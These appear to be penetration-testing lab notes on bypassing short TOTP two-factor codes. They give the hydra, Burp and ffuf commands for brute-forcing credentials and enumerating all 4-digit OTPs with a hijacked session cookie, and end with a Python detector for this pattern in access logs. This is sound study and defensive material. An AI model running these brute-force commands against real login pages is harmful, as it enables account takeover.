2FA

One of the most common 2FA implementations combines a user's password with a time-based one-time password (TOTP) delivered to the user's smartphone by an authenticator app or via SMS. These TOTPs typically consist only of digits, so they become guessable when the code is too short and the web application does not rate-limit or lock out successive incorrect submissions.

#identify valid webapp users
#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
 username: invalid
 password: invalid
 * error: "Invalid username or password"
    - the error msg is case sensitive and MUST be specified exactly as shown when using ffuf, hydra, etc

#brute force credentials
root@oco:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .
root@oco:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .
root@oco:~$ hydra -L top-usernames-shortlist.txt -P 500-worst-passwords.txt 94.237.61.84 -s 59351 -f http-post-form "/:username=^USER^&password=^PASS^:Invalid username or password." -T 128
 
#intercept request & response error msg for use with ffuf
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: admin
 password field: admin
 * submit the expected user input
 
#identify the session cookie, the target page, and the error msg
BURP > Proxy
 Request
  ...
  GET /2fa.php HTTP/1.1
  Host: 94.237.61.84:59351
  Referer: http://94.237.61.84:59351/
  Cookie: PHPSESSID=f38hf9oc8nm0u0npj4pvn1oqs8
  Connection: close
  ...
  Content-Type: application/x-www-form-urlencoded
 
 * the PHPSESSID cookie is required to associate the TOTP with the authenticated session

BURP > Repeater
 Request
  ...
  GET /2fa.php HTTP/1.1
  Host: 94.237.61.84:59351
  Referer: http://94.237.61.84:59351/
  Cookie: PHPSESSID=f38hf9oc8nm0u0npj4pvn1oqs8
  Connection: close
  ...
  Content-Type: application/x-www-form-urlencoded
 Response
  ...
  Invalid 2FA Code.

#generate tokens
#some targets will provide the necessary information regarding the OTP, e.g., "Welcome admin. Please provide your 4-digit One-Time Password (OTP)."
root@oco:~$ seq -w 0 9999 > tokens.txt
 * The -w flag pads all numbers to the same length by prepending zeroes
root@oco:~$ cat tokens.txt
 0000
 ...
 9999

root@oco:~$ ffuf -w tokens.txt -u http://94.237.61.84:59351/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=f38hf9oc8nm0u0npj4pvn1oqs8" -d "otp=FUZZ" -fr "Invalid 2FA" -t 120
 * ...4723  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 147ms]
    - it is normal to get many hits. That is because the session successfully passed
      the 2FA check after the correct TOTP was supplied during the ffuf fuzzing. Since
      4723 was the first hit, it can be assumed this was the correct TOTP. Afterward, 
      the session is marked as fully authenticated, so ALL REQUESTS using the session
      cookie are redirected to /admin.php.
root@oco:~$ BROWSER > http://94.237.61.84:59351/admin.php
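The pattern the fuzzing run leaves behind (a single client posting to /2fa.php hundreds of times a minute, then a run of 302s once the code has been found) is easy to pick out of an access log. This detection is an added example, not part of the original notes; the log lines are constructed here, the path, threshold and window are assumptions, and the IPs are documentation ranges.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
from typing import Deque, Dict, List, Optional

# Combined log format, e.g.
# 203.0.113.9 - - [10/Oct/2023:13:55:00 +0000] "POST /2fa.php HTTP/1.1" 200 0
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def flag_otp_bruteforce(lines: List[str], path: str = "/2fa.php",
                        threshold: int = 20, window_seconds: int = 60) -> Dict[str, dict]:
    """Flag IPs that POST to the OTP endpoint `threshold` or more times in any
    `window_seconds` window. For each flagged IP report the peak count and the
    timestamp of its first 302 (the likely moment the code was accepted)."""
    windows: Dict[str, Deque[datetime]] = defaultdict(deque)
    peaks: Dict[str, int] = {}
    first_302: Dict[str, datetime] = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, p, status = rec
        if p != path or method != "POST":
            continue
        if status == 302 and ip not in first_302:
            first_302[ip] = ts
        q = windows[ip]
        q.append(ts)
        # Sliding window per client: drop submissions older than the window.
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return {ip: {"count": n, "first_302": first_302.get(ip)} for ip, n in peaks.items()}


def _fmt(ip: str, ts: datetime, method: str, path: str, status: int) -> str:
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{stamp}] "{method} {path} HTTP/1.1" {status} 0'


def constructed_log() -> List[str]:
    """Constructed sample: one real user and one client enumerating the OTP."""
    base = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(3):  # legitimate user: a few attempts minutes apart
        lines.append(_fmt("10.0.0.5", base + timedelta(minutes=2 * i), "POST", "/2fa.php", 200))
    for i in range(40):  # automated guessing: two submissions per second
        status = 302 if i >= 37 else 200  # the last three are post-success redirects
        lines.append(_fmt("203.0.113.9", base + timedelta(milliseconds=500 * i),
                          "POST", "/2fa.php", status))
    return lines


if __name__ == "__main__":
    for ip, info in flag_otp_bruteforce(constructed_log()).items():
        print(ip, info["count"], info["first_302"])
```

Because the invalid responses on this target return 200 with the body "Invalid 2FA Code.", a status-only rule would miss the guessing phase; the per-client request rate to the OTP endpoint is the robust signal, and the first 302 from a flagged client marks where the session should be treated as compromised.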
